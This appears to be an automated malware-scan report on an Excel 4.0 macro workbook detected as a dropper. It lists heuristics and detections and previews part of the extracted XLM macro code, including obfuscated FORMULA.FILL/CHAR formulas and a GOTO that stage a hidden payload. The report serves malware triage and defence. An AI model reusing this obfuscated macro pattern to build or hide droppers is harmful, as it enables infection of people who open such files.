MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file is an Excel 4.0 macro-enabled workbook that contains an Auto_Open macro. Heuristics indicate the use of dangerous functions like RUN, suggesting it is designed to execute a secondary payload. ClamAV detection further confirms its malicious nature as a dropper.
Heuristics 4
-
ClamAV: Xls.Dropper.Agent-7819198-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Agent-7819198-0
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 126190 bytes |
SHA-256: afbd12bef2bd65f133abd30b98bf1bda2ce830ab3a0e89b75b433f90831d7d17 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!T22220 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,EF2,"",319.00000000000000000000 ' Sheet,JN3,"",-0.27125506072874494556 ' Sheet,HA21,"",401.00000000000000000000 ' Sheet,HO34,"",-269.00000000000000000000 ' Sheet,IJ44,"",0.00000000000000000000 ' Sheet,F51,"",-2.94047619047619068766 ' Sheet,HF59,"",-568.00000000000000000000 ' Sheet,FE89,"",231.00000000000000000000 ' Sheet,JM103,"",-0.24285714285714285476 ' Sheet,DG143,"",-16.00000000000000000000 ' Sheet,DC162,"",213.00000000000000000000 ' Sheet,FL171,"",-1.00000000000000000000 ' Sheet,IO181,"",-0.18888888888888888395 ' Sheet,EC192,"",0.73333333333333328152 ' Sheet,GF303,"",-4.81818181818181834331 ' Sheet,BB305,"",-415.62500000000000000000 ' Sheet,FC327,"",286.00000000000000000000 ' Sheet,IM355,"",0.05555555555555555247 ' Sheet,ER362,"",145.00000000000000000000 ' Sheet,DW381,"",-0.19028340080971659076 ' Sheet,CL382,"",4.46835443037974666680 ' Sheet,F439,"",2.13043478260869578733 ' Sheet,DD440,"",3.79569892473118297715 ' Sheet,ET446,"",177.00000000000000000000 ' Sheet,GL466,"",260.00000000000000000000 ' Sheet,EO656,"",-0.37651821862348178183 ' Sheet,O657,"",-143.00000000000000000000 ' Sheet,BH709,"",5.26865671641791077917 ' Sheet,JT709,"",0.11111111111111110494 ' Sheet,JI715,"",-26.00000000000000000000 ' Sheet,DT720,"",8.37254901960784359005 ' Sheet,DS742,"",-4.66037735849056566906 ' Sheet,V789,"",545.00000000000000000000 ' Sheet,IL806,"",-567.00000000000000000000 ' Sheet,HC850,"",1.75892857142857139685 ' Sheet,FY944,"FORMULA.FILL(CHAR(GH22172-FL171)&CHAR(GH22172/GL3274)&CHAR(L1792-BM39822)&CHAR(L1792*BS14056)&CHAR(IZ54844-JN62167)&CHAR(HN56344*FS1451)&CHAR(FD41003/BJ44225)&CHAR(IZ54844/BK19420)&CHAR(L1792-FH9519)&CHAR(FD41003+DV62033)&CHAR(CZ60163-HA30445)&CHAR(HA21781*CM9922)&CHAR(L1792-IH5987)&CHAR(FD41003/BO41290)&CHAR(CZ60163+IK63175)&CHAR(HN56344*FL26672)&CHAR(HA21781*DG6217)&CHAR(HA21781*EB3726)&CHAR(IZ54844/GY34718)&CHAR(GH22172+IW45117)&CHAR(FD41003-GM35273)&CHAR(L1792*HJ34141)&CHAR(GH22172-HV40531)&CHAR(L1792*JD57976)&CHAR(L1792*L59902)&CHAR(IZ54844/DG44747)&CHAR(CZ60163-HG9006)&CHAR(IZ54844*IJ56109)&CHAR(EC42994/DZ56957)&CHAR(HA21781+GC23113)&CHAR(HN56344/DY19234)&CHAR(IZ54844/X5050)&CHAR(GH22172+EI30325)&CHAR(FD41003-HT7851),JI48399)","" ' Sheet,FY945,GOTO(JK64244),"" ' Sheet,EV1065,"",2.59210526315789469010 ' Sheet,ID1102,"",155.00000000000000000000 ' Sheet,JQ1177,"",7.46341463414634187501 ' Sheet,BS1234,"",2.66216216216216228219 ' Sheet,JJ1234,"",0.14869281045751633896 ' Sheet,HS1249,"",-0.46558704453441296378 ' Sheet,FU1254,"",388.62500000000000000000 ' Sheet,HR1256,"",284.00000000000000000000 ' Sheet,DC1307,"",-336.00000000000000000000 ' Sheet,IO1341,"",-0.29554655870445345478 ' Sheet,IP1354,"",292.00000000000000000000 ' Sheet,FK1409,"",-301.00000000000000000000 ' Sheet,R1415,"",-349.00000000000000000000 ' Sheet,BO1435,"",440.00000000000000000000 ' Sheet,FS1451,"",-0.62222222222222223209 ' Sheet,FV1536,"",-238.00000000000000000000 ' Sheet,BR1538,"",530.00000000000000000000 ' Sheet,P1544,"",11.12727272727272698205 ' Sheet,BU1579,"FORMULA.FILL(CHAR(GJ35831-BN30163)&CHAR(DI1826+BG31375)&CHAR(DA51790/FU17203)&CHAR(GF53492/IK6530)&CHAR(CI34785/FH51728)&CHAR(FY63197+G16071)&CHAR(DI1826-X40459)&CHAR(GE3002-DC63248)&CHAR(CP50473*P54882)&CHAR(CI34785*DW381)&CHAR(GJ35831+HJ53825)&CHAR(CP50473-BA16844)&CHAR(GJ35831+DF23181)&CHAR(CI34785*HS1249)&CHAR(GF53492-IW61553)&CHAR(GE3002*IG27297)&CHAR(FY63197/CA15386)&CHAR(GF53492*JU19608)&CHAR(GE3002/EW24957)&CHAR(GY58288/GH24056)&CHAR(CP50473*CN10631)&CHAR(GJ35831+CS52600)&CHAR(GJ35831/FF22880)&CHAR(DI1826-IT3239)&CHAR(IO2387*FW2179)& ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.